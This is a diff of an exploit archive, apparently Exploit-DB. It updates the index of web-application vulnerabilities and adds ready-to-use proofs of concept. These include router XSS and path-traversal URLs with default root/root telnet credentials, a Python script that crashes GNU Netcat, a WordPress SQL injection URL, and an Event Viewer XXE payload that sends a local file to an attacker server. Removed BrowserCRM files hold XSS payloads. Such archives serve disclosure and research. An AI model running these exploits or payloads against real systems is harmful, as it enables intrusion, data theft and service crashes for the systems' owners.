27052,platforms/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0
|
||||
|
@ -28749,7 +28756,6 @@ id,file,description,date,author,platform,type,port
|
|||
27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0
|
||||
27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0
|
||||
27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0
|
||||
27152,platforms/php/webapps/27152.txt,"BrowserCRM - results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0
|
||||
27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0
|
||||
27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0
|
||||
27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0
|
||||
|
@ -29383,7 +29389,7 @@ id,file,description,date,author,platform,type,port
|
|||
28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion",2006-06-13,R@1D3N,php,webapps,0
|
||||
28017,platforms/php/webapps/28017.txt,"CEScripts - Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0
|
||||
28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps,0
|
||||
28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - Wap_short_news.php Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0
|
||||
28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0
|
||||
28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0
|
||||
28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0
|
||||
28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0
|
||||
|
@ -29553,7 +29559,7 @@ id,file,description,date,author,platform,type,port
|
|||
28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0
|
||||
28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
|
||||
28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
|
||||
28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0
|
||||
28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0
|
||||
28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0
|
||||
28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0
|
||||
28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0
|
||||
|
@ -29862,9 +29868,9 @@ id,file,description,date,author,platform,type,port
|
|||
28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0
|
||||
28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0
|
||||
28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0
|
||||
28732,platforms/php/webapps/28732.txt,"Yblog - funk.php id Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
28733,platforms/php/webapps/28733.txt,"Yblog - tem.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
28734,platforms/php/webapps/28734.txt,"Yblog - uss.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
28732,platforms/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
|
||||
29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0
|
||||
29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0
|
||||
28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0
|
||||
|
@ -29967,8 +29973,8 @@ id,file,description,date,author,platform,type,port
|
|||
28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion",2006-10-24,Crackers_Child,php,webapps,0
|
||||
28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0
|
||||
28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.asp SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0
|
||||
28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
|
||||
28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
|
||||
28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
|
||||
28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
|
||||
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
|
||||
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
|
||||
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
|
||||
|
@ -30212,7 +30218,7 @@ id,file,description,date,author,platform,type,port
|
|||
29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0
|
||||
29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0
|
||||
29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0
|
||||
29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0
|
||||
29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0
|
||||
29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0
|
||||
29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0
|
||||
29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0
|
||||
|
@ -30945,8 +30951,8 @@ id,file,description,date,author,platform,type,port
|
|||
30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - showuser who Parameter Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps,0
|
||||
30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR - TakeProfEdit.php HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0
|
||||
30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0
|
||||
30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0
|
||||
30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0
|
||||
30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0
|
||||
30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0
|
||||
30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0
|
||||
30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0
|
||||
30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0
|
||||
|
@ -31140,8 +31146,8 @@ id,file,description,date,author,platform,type,port
|
|||
30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0
|
||||
30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0
|
||||
30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0
|
||||
30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0
|
||||
30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0
|
||||
30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0
|
||||
|
@ -34657,13 +34663,13 @@ id,file,description,date,author,platform,type,port
|
|||
36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0
|
||||
36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
|
||||
36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0
|
||||
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
40870,platforms/php/webapps/40870.txt,"Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0
|
||||
36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0
|
||||
36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0
|
||||
36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0
|
||||
36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -188,7 +188,7 @@ Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)
|
|||
1 root S 280 0 0.0 1.9 init
|
||||
# echo * ## ls o.O?!?
|
||||
bin dev etc lib linuxrc mnt proc sbin usr var webs
|
||||
# </textarea>
|
||||
# </textarea>
|
||||
</li>
|
||||
<li id="text-cont_2">
|
||||
<label for="extension">Text file extension:</label>
|
||||
|
|
30
platforms/hardware/remote/40867.txt
Executable file
30
platforms/hardware/remote/40867.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
######################
|
||||
# Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities
|
||||
# Version: Gan9.8U6X-B-TW-R1B020_1T1RP
|
||||
# Exploit Author : Persian Hack Team
|
||||
# Tested on [ Win ]
|
||||
# Date 2016/12/05
|
||||
######################
|
||||
|
||||
1. Cross Site Scripting
|
||||
|
||||
PoC : First We Need To login To Panel And page Parameter Vulnerable to Cross Site Scripting
|
||||
http://192.168.1.1/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E
|
||||
|
||||
|
||||
2. Default Telnet Root Password.txt
|
||||
|
||||
PoC : Username:root Password:root
|
||||
|
||||
telnet 192.168.1.1
|
||||
(none) login: root
|
||||
Password:root
|
||||
~ $ cat /proc/version
|
||||
Linux version 2.6.19 (dsl@crlinux) (gcc version 3.4.6-1.3.6) #3 Fri May 18 13:09:57 CST 2012
|
||||
|
||||
|
||||
3. Directory Traversal.txt
|
||||
|
||||
PoC : First We Need To login To Panel And getpage Parameter Vulnerable to Local File Disclosure
|
||||
http://192.168.1.1/cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page=
|
||||
|
|
@ -33,7 +33,7 @@ while(1){
|
|||
if($file eq ""){ print "Enter full path to file!\n"; }
|
||||
$data=get($bug) || die "$!, try another exploit\n";
|
||||
$data =~ s/Null/File not found!/gs;
|
||||
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
|
||||
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
|
||||
print $1."\n";
|
||||
}}
|
||||
sub usg
|
||||
|
|
78
platforms/linux/dos/40866.py
Executable file
78
platforms/linux/dos/40866.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
#/usr/bin/python
|
||||
#-*- Coding: utf-8 -*-
|
||||
|
||||
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###
|
||||
|
||||
# Date: 2016-11-19
|
||||
# Exploit Author: n30m1nd
|
||||
# Vendor Homepage: http://netcat.sourceforge.net/
|
||||
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
|
||||
# Version: 0.7.1
|
||||
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux
|
||||
|
||||
# Credits
|
||||
# =======
|
||||
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!
|
||||
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!
|
||||
|
||||
# How to
|
||||
# ======
|
||||
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:
|
||||
# * # Download
|
||||
# * tar -xzf netcat-0.7.1.tar.gz
|
||||
# * cd netcat-0.7.1/
|
||||
# * ./configure
|
||||
# * make
|
||||
# * # Netcat will be deployed in src/netcat
|
||||
#
|
||||
# * Set netcat to listen like the following:
|
||||
# * ./netcat -nlvp 12347 -T
|
||||
# * Just run this script on a different terminal
|
||||
#
|
||||
|
||||
# Why?
|
||||
# ====
|
||||
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes
|
||||
# by running them through buggy switch/case code.
|
||||
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.
|
||||
|
||||
# Vulnerable code
|
||||
# ===============
|
||||
# telnet.c
|
||||
# ...
|
||||
# 76 static unsigned char getrq[4];
|
||||
# 77 static int l = 0;
|
||||
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
|
||||
# ...
|
||||
# 88 /* loop all chars of the string */
|
||||
# 89 for (i = 0; i < ref_size; i++) {
|
||||
# 90 /* if we found IAC char OR we are fetching a IAC code string process it */
|
||||
# 91 if ((buf[i] != TELNET_IAC) && (l == 0))
|
||||
# ...
|
||||
#100 getrq[l++] = buf[i]; // BANG!
|
||||
# 99 /* copy the char in the IAC-code-building buffer */
|
||||
# ...
|
||||
# 76 static unsigned char getrq[4];
|
||||
# 77 static int l = 0;
|
||||
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
|
||||
|
||||
# Exploit code
|
||||
# ============
|
||||
|
||||
import socket
|
||||
|
||||
RHOST = "127.0.0.1"
|
||||
RPORT = 12347
|
||||
|
||||
print("[+] Connecting to %s:%d") % (RHOST, RPORT)
|
||||
s = socket.create_connection((RHOST, RPORT))
|
||||
s.send("\xFF") # Telnet control character
|
||||
print("[+] Telnet control character sent")
|
||||
print("[i] Starting")
|
||||
try:
|
||||
i = 0
|
||||
while True: # Loop until it crashes
|
||||
i += 1
|
||||
s.send("\x30")
|
||||
except:
|
||||
print("[+] GNU Netcat crashed on iteration: %d") % (i)
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/16435/info
|
||||
|
||||
BrowserCRM is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
||||
|
||||
http://www.example.com/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/51060/info
|
||||
|
||||
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
29
platforms/php/webapps/40870.txt
Executable file
29
platforms/php/webapps/40870.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection
|
||||
# Date: 28/11/2016
|
||||
# Exploit Author: Lenon Leite
|
||||
# Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/
|
||||
# Software Link: https://wordpress.org/plugins/simple-personal-message/
|
||||
# Contact: http://twitter.com/lenonleite
|
||||
# Website: http://lenonleite.com.br/
|
||||
# Category: webapps
|
||||
# Version: 1.0.3
|
||||
# Tested on: Windows 8
|
||||
|
||||
1 - Description:
|
||||
|
||||
$_GET['message'] is not escaped. Is accessible for every registered user.
|
||||
|
||||
http://lenonleite.com.br/en/blog/2016/12/05/single-personal-message-1-0-3-plugin-wordpress-sql-injection/
|
||||
|
||||
2 - Proof of Concept:
|
||||
|
||||
1 - Login as regular user (created using wp-login.php?action=register):
|
||||
|
||||
2 - Access url:
|
||||
|
||||
http://target/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=0%20UNION%20SELECT%201,2.3,name,5,slug,7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1
|
||||
|
||||
3 - Timeline:
|
||||
|
||||
28/11/2016 - Discovered
|
||||
28/11/2016 - vendor notified
|
126
platforms/windows/local/40863.txt
Executable file
126
platforms/windows/local/40863.txt
Executable file
|
@ -0,0 +1,126 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=================
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
========================
|
||||
Microsoft Event Viewer
|
||||
Version: 1.0
|
||||
|
||||
The Windows Event Viewer shows a log of application and system messages –
|
||||
errors, information messages, and warnings.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
XML External Entity
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Windows Event Viewer user can import 'Custom View' files, these files
|
||||
contain XML, the parser processes External Entity potentially allowing
|
||||
attackers
|
||||
to gain remote file access to files on a victims system if user imports a
|
||||
corrupt XML file via remote share/USB (or other untrusted source).
|
||||
|
||||
|
||||
|
||||
Tested Windows 7 SP1
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
|
||||
1) Go to Windows CL type 'eventvwr' to bring up Windows Event Viewer.
|
||||
2) Action / Import Custom View
|
||||
3) Import the malicious 'MyCustomView.xml' via remote share or USB for POC
|
||||
4) Files are accessed and sent to remote server.
|
||||
|
||||
User gets error like "The specified custom view is not valid" attacker gets
|
||||
files!
|
||||
|
||||
|
||||
|
||||
"payload.dtd" (host on attacker server)
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
|
||||
%all;
|
||||
|
||||
|
||||
"MyCustomView.xml" (malicious windows Event Custom View XML)
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE APPARITION [
|
||||
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
|
||||
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
|
||||
%dtd;]>
|
||||
<pwn>&send;</pwn>
|
||||
|
||||
|
||||
Attacker server listener
|
||||
|
||||
python -m SimpleHTTPServer 8080
|
||||
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================================
|
||||
Vendor Notification: August 30, 2016
|
||||
Vendor reply: "does not meet the bar for security servicing." August 30,
|
||||
2016
|
||||
December 4, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
132
platforms/windows/local/40864.txt
Executable file
132
platforms/windows/local/40864.txt
Executable file
|
@ -0,0 +1,132 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=================
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
==========================
|
||||
Windows System Information
|
||||
MSINFO32.exe v6.1.7601
|
||||
|
||||
|
||||
Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system
|
||||
components, and software environment.
|
||||
|
||||
Parameters
|
||||
FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
XML External Entity
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack
|
||||
which can potentially allow remote attackers to
|
||||
gain access to and exfiltrate files from the victims computer if they open
|
||||
a malicious ".nfo" file via remote share / USB etc.
|
||||
|
||||
Upon open the file user will see error message like "System Information is
|
||||
unable to open this .nfo file. The file might
|
||||
be corrupt etc..
|
||||
|
||||
|
||||
Tested Windows 7 SP1
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
|
||||
This file contains credentials for MS ADO Remote Data Services.
|
||||
|
||||
|
||||
